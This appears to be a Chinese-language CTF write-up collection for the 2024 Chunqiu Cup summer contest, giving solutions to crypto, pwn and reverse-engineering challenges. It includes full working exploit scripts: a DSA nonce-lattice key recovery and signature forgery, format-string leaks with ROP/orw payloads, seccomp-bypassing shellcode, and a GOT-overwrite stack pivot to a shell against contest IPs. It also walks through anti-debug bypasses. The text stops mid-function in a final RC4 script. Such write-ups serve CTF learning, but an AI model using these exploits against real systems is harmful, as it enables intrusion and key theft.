【WP】2024年春秋杯夏季赛解题思路详解合集

admin 2024年7月29日20:45:30评论62 views字数 55251阅读184分10秒阅读模式

ezzzecc

解题过程

【WP】2024年春秋杯夏季赛解题思路详解合集

看到其他数都给了,唯独p是通过加密的。

【WP】2024年春秋杯夏季赛解题思路详解合集

通过一次base62,4次base64即可解密得到一串不知名字符串

【WP】2024年春秋杯夏季赛解题思路详解合集

在通过与给定格式的p值相对比得到-11

【WP】2024年春秋杯夏季赛解题思路详解合集

脚本跑出来原来的p值

data="""e2p.*'*-)+-,+*'&.&)&+'+&+-,',..,.(*,++-%()-&',,*--&%+,..(*.)%,)-+*,%%)+(*.,+',%(r"""
for i in range(len(data)):
    print(chr(ord(data[i])+11),end="")
【WP】2024年春秋杯夏季赛解题思路详解合集

通过发现,其实k值也没有给出,需要自己写脚本爆破

M = 95258468765219141626168727997935766803481277588106799359407486570046359762703
a = 87425770561190618633288232353256495656281438408946725202136726983601884085917
b = 107879772066707091306779801409109036008421651378615140327877558014536331974777
def add(A,B):
    if A==(0,0): return B
    if B==(0,0): return A
    x1,y1 = A
    x2,y2 = B
    if A!=B:
        p = (y2-y1)*pow(x2-x1,M-2,M)
    else:
        p = (3*x1*x1+a)*pow(2*y1,M-2,M)
    x3 = p*p-x1-x2
    y3 = p*(x1-x3)-y1
    return (x3%M,y3%M)

base = (3403102256793551255818447153303571655455737832128929312039229425873156667356574331715224220154299708533566163247663094029276428146274456519014761122295496)
pub = (4929315036076141830941120962140518543742600379200848020638704705677701110493943598371886286324285673726736628847559547403221353820773139325027318579443479)
X = (0,0)

for i in range(M):
if X==pub:
secret = i
print("secret:" + str(secret))
break
X = add(X, base)
print(i)

from libnum import s2n,n2s
from Crypto.Util.number import *
p = 95258468765219141626168727997935766803481277588106799359407486570046359762703
a = 87425770561190618633288232353256495656281438408946725202136726983601884085917
b = 107879772066707091306779801409109036008421651378615140327877558014536331974777
k = 166909
E=EllipticCurve(GF(p),[a,b])
c1 = E(3315847183153421424358678117707706758962521458183324187760613108746362414091 , 61422809633368910312843316855658127170184420570309973276760547643460231548014)
c2 = E(12838481482175070256758359669437500951915904121998959094172291545942862161864  , 60841550842604234546787351747017749679783606696419878692095419214989669624971)
cipher_left = 75142205156781095042041227504637709079517729950375899059488581605798510465939
cipher_right = 61560856815190247060747741878070276409743228362585436028144398174723191051815
m=c1-k*c2
print(n2s(int(cipher_left/m[0]))+n2s(int((cipher_right/m[1]))))

 

 

happy2024

解题过程

题目是RSA+AES的组合,其中RSA加密了AES的key,而AES的iv由矩阵乘法混淆了,实际上是一个hssp。

首先求解一下rsa。这里的hint比特关系非常明显,可以猜测是用格来打。梳理一下hint的组成:

 

 

根据该条件可以构造一个格,目的是得到每一维度量级在1024比特左右的三维向量。格子构造如下:

 

 

规约后理论上能得到的短向量是,但是实际测试发现无论怎么调系数都无法得到正确结果。于是用高斯启发式Gaussian Heuristic计算一下发现是卡了界的。于是考虑爆破几个比特,那么需要修改一下格的结构。这里有个小技巧是可以爆破p^2和 q^2,如果是直接爆破p q的话等式展开会麻烦不少。爆破和 的5个比特分别为i和j,设,那么新的格子如下:

 

 

拿到CBC_key之后再求一下iv即可。

对于hssp问题,论文A Polynomial-Time Algorithm for Solving the Hidden Subset Sum Problem给出了攻击方法:

【WP】2024年春秋杯夏季赛解题思路详解合集

实现一下算法求解即可:

from Crypto.Util.number import *

n = 60
m = 330
p = ...
w = ...
MM = ...

e = 0x10001
MM = matrix(GF(2), MM)

def allpmones(v):
return len([vj for vj in v if vj in [-1, 0, 1]]) == len(v)

# We generate the lattice of vectors orthogonal to b modulo x0
def orthoLattice(b, x0):
m = b.length()
M = Matrix(ZZ, m, m)

for i in range(1, m):
M[i, i] = 1
M[1:m, 0] = -b[1:m] * inverse_mod(b[0], x0)
M[0, 0] = x0

for i in range(1, m):
M[i, 0] = mod(M[i, 0], x0)

return M

def allones(v):
if len([vj for vj in v if vj in [0, 1]]) == len(v):
return v
if len([vj for vj in v if vj in [0, -1]]) == len(v):
return -v
return None

def recoverBinary(M5):
lv = [allones(vi) for vi in M5 if allones(vi)]
n = M5.nrows()
for v in lv:
for i in range(n):
nv = allones(M5[i] - v)
if nv and nv not in lv:
lv.append(nv)
nv = allones(M5[i] + v)
if nv and nv not in lv:
lv.append(nv)
return Matrix(lv)

def kernelLLL(M):
n = M.nrows()
m = M.ncols()
if m < 2 * n:
return M.right_kernel().matrix()
K = 2 ^ (m // 2) * M.height()

MB = Matrix(ZZ, m + n, m)
MB[:n] = K * M
MB[n:] = identity_matrix(m)

MB2 = MB.T.LLL().T

assert MB2[:n, : m - n] == 0
Ke = MB2[n:, : m - n].T

return Ke

def attack(m, n, p, h):
# This is the Nguyen-Stern attack, based on BKZ in the second step
print("n =", n, "m =", m)

iota = 0.035
nx0 = int(2 * iota * n ^ 2 + n * log(n, 2))
print("nx0 =", nx0)

x0 = p
b = vector(h)

# only information we get
M = orthoLattice(b, x0)

t = cputime()
M2 = M.LLL()
print("LLL step1: %.1f" % cputime(t))

# assert sum([vi == 0 and 1 or 0 for vi in M2 * X]) == m - n
MOrtho = M2[: m - n]

print("  log(Height, 2) = ", int(log(MOrtho.height(), 2)))

t2 = cputime()
ke = kernelLLL(MOrtho)

print("  Kernel: %.1f" % cputime(t2))
print("  Total step1: %.1f" % cputime(t))

if n > 170:
return

beta = 2
tbk = cputime()
while beta < n:
if beta == 2:
M5 = ke.LLL()
else:
M5 = M5.BKZ(block_size=beta)

# we break when we only get vectors with {-1,0,1} components
if len([True for v in M5 if allpmones(v)]) == n:
break

if beta == 2:
beta = 10
else:
beta += 10

print("BKZ beta=%d: %.1f" % (beta, cputime(tbk)))
t2 = cputime()
MB = recoverBinary(M5)
print("  Recovery: %.1f" % cputime(t2))
print("  Number of recovered vector = ", MB.nrows())
print("  Number of recovered vector.T = ", MB.ncols())
return MB

res = attack(m, n, p, w)

 

最后解aes。

Signature

解题过程

proof过程根据逻辑编写python代码爆破

from pwn import *
from Crypto.Util.number import *
import gmpy2
r = remote('',1337)
context.log_level = 'debug'
def proof():
    r.recvuntil(b'Your gift --> ')
    gift = r.recvline()[:-1].decode()
    password = 'happy_the_year_of_loong'
    l = 19
    table = [i for i in range(len(password)) if password[i] in string.ascii_lowercase]
    # print(table)
    for i in range(2 ** l):
        pad = bin(i)[2:].zfill(l)
        tmp_list = list(password)
        for j in range(len(table)):
            if pad[j] == '0':
                tmp_list[table[j]] = tmp_list[table[j]].upper()
        payload = ''.join(tmp_list)
        if hashlib.sha256(payload.encode()).hexdigest()[:6] == gift:
            r.recvuntil(b'>')
            r.sendline(payload.encode())
            return
proof()
【WP】2024年春秋杯夏季赛解题思路详解合集

成功爆破得解进入下一环节。

之后是DSA签名,主要洞在签名部分的系数k上

k = int(hashlib.md5(os.urandom(20)).hexdigest(),16)

这样生成的系数k为128位,偏小,可以通过格基规约的方法得解。通过8次交互获取数据构造格。

首先先理清楚签名关系。x是私钥大小为160位,构造等式为

令,构造格子如下

 

 

可以得到系数k,之后再计算x。得到的未必就是x的精确值,这里用系数代回式子得到x,完整exp如下

from pwn import *
from Crypto.Util.number import *
import gmpy2
r = remote('116.205.134.67',1337)
context.log_level = 'debug'
def proof():
    r.recvuntil(b'Your gift --> ')
    gift = r.recvline()[:-1].decode()
    password = 'happy_the_year_of_loong'
    l = 19
    table = [i for i in range(len(password)) if password[i] in string.ascii_lowercase]
    for i in range(2 ** l):
        pad = bin(i)[2:].zfill(l)
        tmp_list = list(password)
        for j in range(len(table)):
            if pad[j] == '0':
                tmp_list[table[j]] = tmp_list[table[j]].upper()
        payload = ''.join(tmp_list)
        if hashlib.sha256(payload.encode()).hexdigest()[:6] == gift:
            r.recvuntil(b'>')
            r.sendline(payload.encode())
            return
proof()
r.recvuntil(b'>')
r.sendline(b'3')
r.recvuntil(b'Oh,your key is (')
p,q,g = list(map(int,r.recvline()[:-2].decode().split(',')))
ms = [str(i).encode() for i in range(8)]
rs = []
ss = []
hs = []
for m in ms:
    H = int(hashlib.sha256(m).hexdigest(), 16)
    r.recvuntil(b'>')
    r.sendline(b'1')
    r.recvuntil(b'Username:')
    r.sendline(m)
    r.recvuntil(b'This is your signature -- > ')
    R,S = list(map(int,r.recvline()[:-1].decode().split(',')))
    rs.append(R)
    ss.append(S)
    hs.append(H)
def getk0(q,rs,ss,hs):
    A = []
    B = []
    n = len(rs)
    for i in range(n):
        a = rs[i] * inverse_mod(ss[i], q) % q
        b = hs[i] * inverse_mod(ss[i], q) % q
        A.append(a)
        B.append(b)
    mat = [[0 for _ in range(n + 2)] for _ in range(n + 2)]
    for i in range(n):
        mat[i][i] = q
        mat[-2][i] = A[i]
        mat[-1][i] = B[i]
    mat[-2][-2] = 1 / (2 ** 32)
    mat[-1][-1] = 2 ** 128
    mat = matrix(QQ, mat)
    print(mat.LLL())
    return abs(int(mat.LLL()[1][0]))
k0 = getk0(q,rs,ss,hs)
print(f'k0 --> {k0}')
r0 = rs[0]
s0 = ss[0]
H0 = hs[0]
pri = int((s0 * k0 - H0) * gmpy2.invert(r0,q) % q)
k = int(hashlib.md5(os.urandom(20)).hexdigest(),16)
m = b'admin'
H = int(hashlib.sha256(m).hexdigest(),16)
rr = pow(g,k,p) % q
s = pow(k,-1,q) * (H + pri * rr) % q
r.sendline(b'2')
r.recvuntil(b'r:')
r.sendline(str(rr).encode())
r.recvuntil(b's:')
r.sendline(str(s).encode())
r.interactive()

 

class

解题过程

下载附件得到一个class文件,打开可以发现是一个python文件,里面有很多的类。搜索一下OS 命令,可以发现存在一个 cat /flag

【WP】2024年春秋杯夏季赛解题思路详解合集

该函数肯定和flag有关,每个类和函数均为_符号+八个字节,尝试将执行os.system('cat /flag')的整个利用链的所有类和函数全部统计出来

写一个python脚本进行污点分析:

import ast
import astor

with open("class""r"as file:
source_code = file.read()
syntax_tree = ast.parse(source_code)

class_dict = {}

for node in syntax_tree.body:
if isinstance(node, ast.ClassDef):
class_name = node.name
class_dict[class_name] = {}
for inner_node in node.body:
if isinstance(inner_node, ast.FunctionDef):
func_name = inner_node.name
class_dict[class_name][func_name] = []
for code in inner_node.body:
class_dict[class_name][func_name].append(astor.to_source(code).strip())

class_keys = []
for func_dict in class_dict.items():
if 'os.system' in str(func_dict):
sub = func_dict[1][list(func_dict[1].items())[0][0]][0].split('n')[0].split(' ')
if sub[2] == '>':
if int(sub[1]) < int(sub[3][:-1]):
continue
elif sub[2] == '<':
if int(sub[1]) > int(sub[3][:-1]):
continue
class_keys.append(func_dict[0])

for key in class_keys:
class_key = key
func_key = list(class_dict[class_key])[0]
list_class = [class_key]
flag = 1
flags = 0
while flag != 0 and flags == 0:
flag = 1
flags = 0
for func_dict in class_dict.items():
for code in func_dict[1].items():
if class_key in code[1][0and func_key in code[1][0]:
sub = code[1][0].split('n')[0].split(' ')
if sub[2] == '>':
if int(sub[1]) < int(sub[3][:-1]):
flag = -1
elif sub[2] == '<':
if int(sub[1]) > int(sub[3][:-1]):
flag = -1
flags = 2
func_key = code[0]
class_key = func_dict[0]
list_class.append(class_key)
else:
if flag == -1:
flags = 1
if flags == 2:
flags = 0
continue
if flag == 1 and flags == 0:
break
if flag != -1:
for cla in list_class:
print(cla[1:].replace('O''0'), end='')

跑一遍即可得到一整个利用链的命名顺序,注意将'O'字符转化为'0'字符

【WP】2024年春秋杯夏季赛解题思路详解合集

做一个hex解密,可以得到是7z压缩包

【WP】2024年春秋杯夏季赛解题思路详解合集

解压压缩包即可得到flag:

【WP】2024年春秋杯夏季赛解题思路详解合集

 

SavethePrincess

解题过程

通过格式化字符串漏洞泄漏libc_base,canary,pie_base,stack地址,

因为禁用了exevce函数,进而通过构造orw获取flag。

from pwn import *
from struct import *
from ctypes import *
#import ctf_pb2

c = cdll.LoadLibrary('./libc.so.6')
# srop :    frame = SigreturnFrame()
# fmt :        fmtstr_payload(offset=7,writes={0x4031E0:0x0401445,0x403410:0x401445},numbwritten=((14*2)+1),write_size='short')

s    =    lambda a              :pw.send(a)
sl   =    lambda a              :pw.sendline(a)
sa   =    lambda a,b            :pw.sendafter(a,b)
sla  =    lambda a,b            :pw.sendlineafter(a,b)
r    =    lambda a=6666         :pw.recv(a)
rl   =    lambda                :pw.recvline()
ru   =    lambda a,b=True       :pw.recvuntil(a,b)
g64  =    lambda                :u64(pw.recvuntil(b'x7f')[-6:].ljust(8,b'x00'))
g32  =    lambda                :u32(pw.recvuntil(b'xf7').ljust(4,b'x00'))
gl   =    lambda a              :u64(pw.recvuntil(a,drop=True).ljust(8,b'x00'))
gc   =    lambda a              :u64(pw.recv(7).rjust(8,b'x00'))
pwpw =    lambda                :pw.interactive()
lss  =    lambda s :log.success('�33[1;31;40m%s --> 0x%x �33[0m' % (s, eval(s)))
cal  =    lambda a,b            :((a - b) + 0x10000) % 0x10000

def sb(libc_base):
return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/shx00'))

def orw(libc_base):
return libc_base + libc.sym['open'], libc_base + libc.sym['read'], libc_base + libc.sym['write']

def search():
libc = LibcSearcher("puts", puts)
libc_base = puts - libc.dump("puts")
system = libc.dump("system") + libc_base
binsh = libc.dump("str_bin_sh") + libc_base
return system,binsh

def dbg(a=''):
if a !='':
gdb.attach(pw,a)
pause()
else:
gdb.attach(pw)
pause()

# context(os = 'linux', arch = 'amd64', log_level = 'debug')
# context.arch='i386'
context.terminal=["tmux" ,"split" ,"-h"]
context.arch = 'amd64'
file = './SavethePrincess'
elf = ELF(file)
#libc = ELF('/home/pw/pwn_tools/glibc-all-in-one/libs/2.35-0ubuntu3_amd64/libc.so.6')    
libc = ELF('./libc.so.6')
debug = 1
if debug == 0:
pw = process(file)
if debug == 1:
pw = remote('127.0.0.1',2000)
if debug == 2:
gdbscript = '''
set debug-file-directory /home/pwn_tools/glibc-all-in-one/libs/2.31-0ubuntu9.16_amd64/.debug/
continue
'''

pw = gdb.debug(file, gdbscript=gdbscript)

#----------------------------------------------------------------------
def magic(pd):
sla(b'> ',str(1))
sa(b':',pd)

# dbg('b *$rebase(0x15f2)')
flag = b""
key = b""
for i in range(8):
key = flag
print(len(flag))
for k in range(ord('a'),ord('z')+1):
if len(flag) == 7:
key = flag + p8(k)
key = key.ljust(10,b'a')
magic(key)
print(rl())
if b'successfully' not in rl():
continue
else:
flag += chr(k).encode()
break
key = flag + p8(k)
key = key.ljust(10,b'a')
magic(key)
ru(b'is ')
x = ru(b'n')
print(x)
if(len(x) != 10 and int(x[-1]) == i+1):
flag += chr(k).encode()
print(flag)
# pause()
break
print(flag)

s(b'n')
magic(flag)
# dbg('b *$rebase(0x166a)')
s(b'%15$p%9$p%11$p%10$p')

rl()
rl()
libc_base = int(pw.recv(14),16)-0x29d90
canary = int(pw.recv(18),16)
pie_base = int(pw.recv(14),16) - 121 - 0x01745
stack = int(pw.recv(14),16)
lss('libc_base')
lss('canary')
lss('pie_base')
lss('stack')

rdi = libc_base + 0x2a3e5
rsi = libc_base + 0x2be51
rdx_rbx = libc_base + 0x00904a9
rax = libc_base + 0x45eb0
r13 = libc_base + 0x0000000000041c4a
rcx = libc_base + 0x000000000003d1ee
xchg_r8_rax = libc_base + 0x9998e
mov_r9 = libc_base + 0xd39d7
# 0x00000000000d39d7 : push 0 ; mov r9, qword ptr [rsp + 0x10] ; call r13
r10 = pie_base + 0x017D5
syscall = libc_base + 0x11481a
xchg_rsi_rax =  0x00000000001b5b65 + libc_base
# 0x00000000001b5b65 : xchg rsi, rax ; jmp qword ptr [rdx - 0xd]

# dbg('b *$rebase(0x16ed)')
payload = p64(rdi)+p64(0xFFFFFFFFFFFFFFFF - 99)+p64(rsi)+p64(pie_base+0x4010)+p64(libc_base+libc.sym['openat'])
payload += p64(r10)+p64(2)+p64(rcx)+p64(2)+p64(r13)+p64(syscall)+p64(rdx_rbx)+p64(7)+p64(0)+p64(rdi)+p64(0)+p64(rsi)+p64(0x50)+p64(rax)+p64(3)+p64(xchg_r8_rax)+p64(0)*3+p64(rax)+p64(9)+p64(mov_r9+2)+p64(0)*2+p64(0)+b'a'*8+p64(rdx_rbx)+p64(stack+0x100+0xd)*2+p64(xchg_rsi_rax)+p64(rdi)*2+p64(1)+p64(rdx_rbx)+p64(0x30)*2+p64(libc_base+libc.sym['write'])

print("len :"+hex(len(payload)))
sla(b'> ',str(2))
sl(b'a'*(0x40-8) + p64(canary) + p64(0) + payload)

# dbg()
pwpw()

 

Shuffled_Execution

解题过程

保护全开,且开启沙盒

 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x0d 0xc000003e  if (A != ARCH_X86_64) goto 0015
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x0a 0xffffffff  if (A != 0xffffffff) goto 0015
 0005: 0x15 0x09 0x00 0x00000000  if (A == read) goto 0015
 0006: 0x15 0x08 0x00 0x00000001  if (A == write) goto 0015
 0007: 0x15 0x07 0x00 0x00000002  if (A == open) goto 0015
 0008: 0x15 0x06 0x00 0x00000011  if (A == pread64) goto 0015
 0009: 0x15 0x05 0x00 0x00000013  if (A == readv) goto 0015
 0010: 0x15 0x04 0x00 0x00000028  if (A == sendfile) goto 0015
 0011: 0x15 0x03 0x00 0x0000003b  if (A == execve) goto 0015
 0012: 0x15 0x02 0x00 0x00000127  if (A == preadv) goto 0015
 0013: 0x15 0x01 0x00 0x00000142  if (A == execveat) goto 0015
 0014: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0015: 0x06 0x00 0x00 0x00000000  return KILL

向rwx段读入shellcodeshuffle()函数根据shellcode长度随机打乱读入的shellcode 构造含x00的shellcode尽早结束strlen,降低shuffle()影响 使用openat+mmap+writev绕过沙盒

from pwn import *
context(log_level='debug', arch='amd64', terminal=['tmux', 'splitw', '-h'])

io = process("./Shuffled_Execution")
# io = remote("127.0.0.1", 9999)

# gdb.attach(io)

payload = asm('''
xor eax , 0x1111
xor eax , eax
.rept 3
nop
.endr
mov rsp , 0x1337000
mov rdi , 3
lea rsi , [rip+path]
mov rdx , 0
mov rax , 257
syscall

mov rdi , 0x1337000
mov rsi , 0x1000
mov rdx , 7
mov r10 , 0x02
mov r8 , 3
mov r9 , 0
mov rax , 9
syscall

mov rdi , 1
mov rsi , 0x1337400
lea rcx , [rax]
mov [rsi] , rcx
add rsi , 8
mov dword ptr [rsi] , 0x50
add rsi , 8
mov [rsi] , rcx
sub rsi , 0x10

mov rdx , 0x1
mov rax , 20
syscall

path:
.string "/flag.txt"
''')

print(payload)

io.sendafter(".n", payload)

io.interactive()

 

 

stdout

解题过程

题目的主要逻辑就是main函数 extend函数是为了多几个函数 用来扩充got表 否则在解题过程中 会覆盖到stdout

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[80]; // [rsp+0h] [rbp-50h] BYREF

init(argc, argv, envp);
puts("where is my stdout???");
read(0, buf, 0x60uLL);
return 0;
}

可以溢出0x10字节 用来覆盖rbp和retaddr

表面上是一个非常简单的ret2libc加上栈迁移

实际上我对缓冲区动了手脚

int init()
{
  setvbuf(stdout0LL, 00LL);
  return setvbuf(stdin0LL, 20LL);
}

stdout被我改成了全缓冲区 这意味着要么用几十万甚至更多的字节填满缓冲区 要么就利用fflush函数清空

但是这题没有给怎么 想到的是覆盖got表 发现setvbuf的got表和fflush比较接近 只需要爆破一位 十六分之一的概率

同时 为了不破坏其他函数的got表 我们需要先计算偏移 使得在覆盖got表的时候能够正常返回下一个链

最后利用setvbuf成功清空缓存区 泄露出libc地址 打栈迁移getshell即可

from pwn import*
from ctypes import *
#io = process("./pwn")
io = remote("127.0.0.1",10002)
elf = ELF("./pwn")
context.terminal = ['tmux','splitw','-h']
libc = ELF("./glibc-all-in-one/libs/2.31-0ubuntu9.9_amd64/libc-2.31.so")
context.arch = "amd64"
context.log_level = "debug"

# io = process("./pwn")
# payload = cyclic(0x50)+p64(0x404090+0x50)+p64(0x40134D)
# io.send(payload)
# payload = p64(elf.bss(0xb00)+0x50)+p64(0x40134D)+cyclic(0x40)+p64(elf.got['setvbuf']+0x50)+p64(0x40134D)
# io.send(payload)
# payload = 'x40xc3'
# io.send(payload)
# rdi_addr=0x00000000004013d3
# read_got = elf.got['read']
# puts_plt = elf.sym['puts']
# main_addr = elf.sym['main']
# leave_ret = 0x0000000000401285
# payload = p64(rdi_addr)+p64(read_got)+p64(puts_plt)+p64(main_addr)+cyclic(0x30)+p64(0x404b70-0x8)+p64(leave_ret)
# # gdb.attach(io,'b *0x40136E')
# # pause(0)
# io.send(payload)
# io.recvuntil("x0a")
# libc_addr = u64(io.recv(6).ljust(8,b'x00'))-libc.sym['read']
# success("libc_addr :"+hex(libc_addr))
# system_addr = libc.sym['system']+libc_addr
# binsh_addr = libc_addr + next(libc.search(b"/bin/sh"))
# ret_addr = 0x000000000040101a
# payload = p64(ret_addr)+p64(rdi_addr)+p64(binsh_addr)+p64(system_addr)+cyclic(0x30)+p64(0x404b38-0x8)+p64(leave_ret)
# # gdb.attach(io,'b *0x40136E')
# # pause(0)
# io.send(payload)
# io.interactive()

def exploit():
io = remote("124.71.97.27",10002)
payload = cyclic(0x50)+p64(0x404090+0x50)+p64(0x40134D)
sleep(0.5)
io.send(payload)
payload = p64(elf.bss(0xb00)+0x50)+p64(0x40134D)+cyclic(0x40)+p64(elf.got['setvbuf']+0x50)+p64(0x40134D)
sleep(0.5)
io.send(payload)
payload = 'x40xc3'
sleep(0.5)
io.send(payload)
rdi_addr=0x00000000004013d3
read_got = elf.got['read']
puts_plt = elf.sym['puts']
main_addr = elf.sym['main']
leave_ret = 0x0000000000401285
payload = p64(rdi_addr)+p64(read_got)+p64(puts_plt)+p64(main_addr)+cyclic(0x30)+p64(0x404b70-0x8)+p64(leave_ret)
# gdb.attach(io,'b *0x40136E')
# pause(0)
sleep(0.5)
io.send(payload)
io.recvuntil("x0a")
libc_addr = u64(io.recv(6).ljust(8,b'x00'))-libc.sym['read']
success("libc_addr :"+hex(libc_addr))
system_addr = libc.sym['system']+libc_addr
binsh_addr = libc_addr + next(libc.search(b"/bin/sh"))
ret_addr = 0x000000000040101a
payload = p64(ret_addr)+p64(rdi_addr)+p64(binsh_addr)+p64(system_addr)+cyclic(0x30)+p64(0x404b38-0x8)+p64(leave_ret)
# gdb.attach(io,'b *0x40136E')
# pause(0)
sleep(0.5)
io.send(payload)
io.sendline("cat flag")
result = io.recv(timeout=1)
io.interactive()

if __name__ == '__main__':
try_count = 0
while(True):
try:
exploit()
except:
try_count += 1
print("failed :{}".format(try_count))

 

BEDTEA

解题过程

根据字符串可以很快定位到关键函数

【WP】2024年春秋杯夏季赛解题思路详解合集

调试发现这些是没有逻辑的垃圾值,只是为了混淆而出

【WP】2024年春秋杯夏季赛解题思路详解合集

这个地方是一个时间戳检测,通过两次时间戳的不同来获取运行时间然后可以用来做反调试

只要不在这两个地方之间下断点就好了,或者手动patch一下

【WP】2024年春秋杯夏季赛解题思路详解合集
【WP】2024年春秋杯夏季赛解题思路详解合集

这里也是通过一个PEB来实现反调试,调试的话会赋值为3,不调试则是1

【WP】2024年春秋杯夏季赛解题思路详解合集

可以通过修改eax寄存器的值来达到绕过

【WP】2024年春秋杯夏季赛解题思路详解合集

继续跟进下面的逻辑,很明显的tea特征但是细心可以发现是魔改了左移右移常数和轮数

【WP】2024年春秋杯夏季赛解题思路详解合集

上面有常数的赋值

【WP】2024年春秋杯夏季赛解题思路详解合集

其实继续调试到下面,会发现这里的key后面会被再次赋值

所以这个并不是真正的key,真正的key可以在调试的时候拿到,轮数也可以调试拿到

这里原来通过key可以看出3,5,8,13,21,34这其实是斐波那契数列

(源码中也可以看见这里是通过初始矩阵然后矩阵乘法来获取斐波那契数列

但是考虑到可能有点些许脑洞于是就成了现在这样,调试的时候可以拿key)

【WP】2024年春秋杯夏季赛解题思路详解合集

后面两个tea函数是相同的,只是key是不同的,耐心调试就可以拿到

此处不一一赘述

这两个函数是关键,跟进一下

【WP】2024年春秋杯夏季赛解题思路详解合集

有能力的师傅可以逆向看出来这就是一个通过迭代实现二叉树的前序遍历构造(跟进就会无限套娃),

【WP】2024年春秋杯夏季赛解题思路详解合集

下面一个函数就是二叉数的后序遍历

把值拿出来

【WP】2024年春秋杯夏季赛解题思路详解合集

其实这里想的是可以通过前后的输入输出来看这两段干的是一个翻转的功能,即把加密后的结果进行翻转

然后对最后的值进行异或,数据类型被优化了,其实就是异或0x33

【WP】2024年春秋杯夏季赛解题思路详解合集

最后v11和v12是我们的加密的结果和密文

编写脚本即可得到flag

#include <stdio.h>
#include <stdint.h>

//0x76, 0x71, 0x9d, 0xe7, 0x70, 0x77, 0x3f, 0xa3, 0x2, 0xf1, 
// 0x8d, 0xc9, 0x2, 0xc6, 0xa2, 0x4b, 0xba, 0x19, 0x56, 0x5, 0xf2, 
// 0x89, 0x5e, 0xe0
// 异或0x33得到:
//  0x4542AED4  0X43440C90, 
//     0x31C2BEFA 0X31F59178, 
//     0x892A6536  0XC1BA6DD3
//解密函数
void decrypt(uint32_t* v, uint32_t* k) {
uint32_t v0 = v[0], v1 = v[1], sum = 0x987E55D0, i;
uint32_t delta = 0x9e3449b8;
uint32_t k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3];
for (i = 0; i<22; i++) {
v1 -= ((v0 << 5) + k2) ^ (v0 + sum) ^ ((v0 >> 4) + k3);
v0 -= ((v1 << 5) + k0) ^ (v1 + sum) ^ ((v1 >> 4) + k1);
sum -= delta;
}
v[0] = v0; v[1] = v1;
}

int main()
{
// v为要加解密的数据,两个32位无符号整数
uint32_t v[6] = { 0XC1BA6DD3,0X892A6536,0X31F59178,0X31C2BEFA,0X43440C90,0X4542AED4};
// k为加解密密钥,4个32位无符号整数,密钥长度为128位,斐波那契数列

uint32_t k[4] = { 3,5,8,13 };
uint32_t k1[4] = { 21,34,55,89 };
uint32_t k2[4]={144,233,377,610};

decrypt(v, k);
decrypt(v+2, k1);
decrypt(v+4, k2);
puts((char*)v);
printf("n");
return 0;
}
//flag{y0u_reallyl1ke_te@}

 

 

HardSignin

解题过程

脱UPX壳

直接脱壳会失败,010editor打开,修复区段名,将VMP改为UPX即可一键脱壳

【WP】2024年春秋杯夏季赛解题思路详解合集

TLS函数

花指令

TLS函数中存在花指令,手动修复后看到真实逻辑

其中TLS3的花指令将0x4011e8-0x4011f5这段全部nop即可

【WP】2024年春秋杯夏季赛解题思路详解合集

每个TLS函数都存在反调试操作,均为常规反调试API,全部patch即可

TLS0-SMC

TLS0反调试直接patch跳转地址绕过exit分支

执行了SMC操作解密main函数代码,并设置随机数种子为0x114514

【WP】2024年春秋杯夏季赛解题思路详解合集
TLS1-base换表

直接patch跳转地址绕过exit分支

生成伪随机数进行base64换表操作,设置随机数种子为0x1919810

【WP】2024年春秋杯夏季赛解题思路详解合集
TLS2-生成key

直接patch跳转地址绕过exit分支

TLS2生成rc4和xtea的key

【WP】2024年春秋杯夏季赛解题思路详解合集
TLS3

TLS3只执行了反调试,检测到调试器时会强制终止进程

设置ZwSetInformationThread的第二个参数为1即可

【WP】2024年春秋杯夏季赛解题思路详解合集

main函数

idapython修复或者动调看main函数均可

idapython脚本

import ida_bytes
addr=0x401890
for i in range(170):
 data=ida_bytes.get_byte(addr)
 data^=0x66
 ida_bytes.patch_byte(addr,data)
 addr+=1

解密后,逻辑清晰,输入flag后对flag进行base64+rc4+xtea加密

【WP】2024年春秋杯夏季赛解题思路详解合集
checkflag
【WP】2024年春秋杯夏季赛解题思路详解合集
base64
【WP】2024年春秋杯夏季赛解题思路详解合集
rc4
【WP】2024年春秋杯夏季赛解题思路详解合集
xtea
【WP】2024年春秋杯夏季赛解题思路详解合集

getflag

密文静态直接复制,base64表和key需要动调或者脚本生成

密文

unsigned char encflag[64]={  0x59,0x1b,0xfd,0xb4,0x6b,0xb8,0xbe,0xd9,0xb3,0xd3,0x77,0xd6,0xf0,0x65,0x5f,0x18,0xa0,0x9d,0x3a,0x53,0x6d,0x4a,0x7b,0x26,0x74,0x3a,0x9c,0x4e,0x20,0x43,0x19,0xd8,0x72,0xed,0x95,0xb5,0x9c,0x5,0x22,0x56,0xcb,0x7a,0x11,0x91,0x9f,0x7a,0xbc,0xc,0x4a,0x69,0x6d,0xce,0x3d,0xb4,0xab,0x29,0x61,0xfa,0x62,0x32,0xb4,0xec,0x4c,0xb6}

base64表

unsigned char base64_table[64]="4yZRiNP8LoK/GSA5ElWkUjXtJCz7bMYcuFfpm6+hV0rxeHIdwv32QOTnqg1BDsa9"

rc4和xtea的key

unsigned char[16] rc4_key={0x76,0x89,0x33,0x49,0x19,0x13,0xc3,0xc7,0xad,0xd8,0xe4,0x68,0xfc,0x48,0x4,0xbc};
unsigned char[16] xtea_key={0xdd,0x5b,0xaa,0xc,0x24,0x69,0x84,0xd6,0xb8,0x1e,0x4,0x51,0x6,0xab,0x2a,0x8b}

一键getflag脚本

#include<stdio.h>
#include<Windows.h>
#include<stdio.h>
#include<stdlib.h>
#include<stdint.h>
unsigned char sbox[256];
void swap(unsigned char* a, unsigned char* b)
{
 unsigned char tmp = *a;
 *a = *b;
 *b = tmp;
}
void init_sbox(unsigned char key[], int keyLen) {
 for (int i = 0; i < 256; i++)//赋值
  sbox[i] = i;
 unsigned char Ttable[256] = { 0 };
 for (int i = 0; i < 256; i++)
  Ttable[i] = key[i % keyLen];//根据初始化t表
 for (int j = 0, i = 0; i < 256; i++)
 {
  j = (j + sbox[i] + Ttable[i]) % 256//打乱s盒
  swap(&sbox[i], &sbox[j]);
 }
}
void RC4_enc_dec(unsigned char data[], int dataLen, unsigned char key[], int keyLen) {
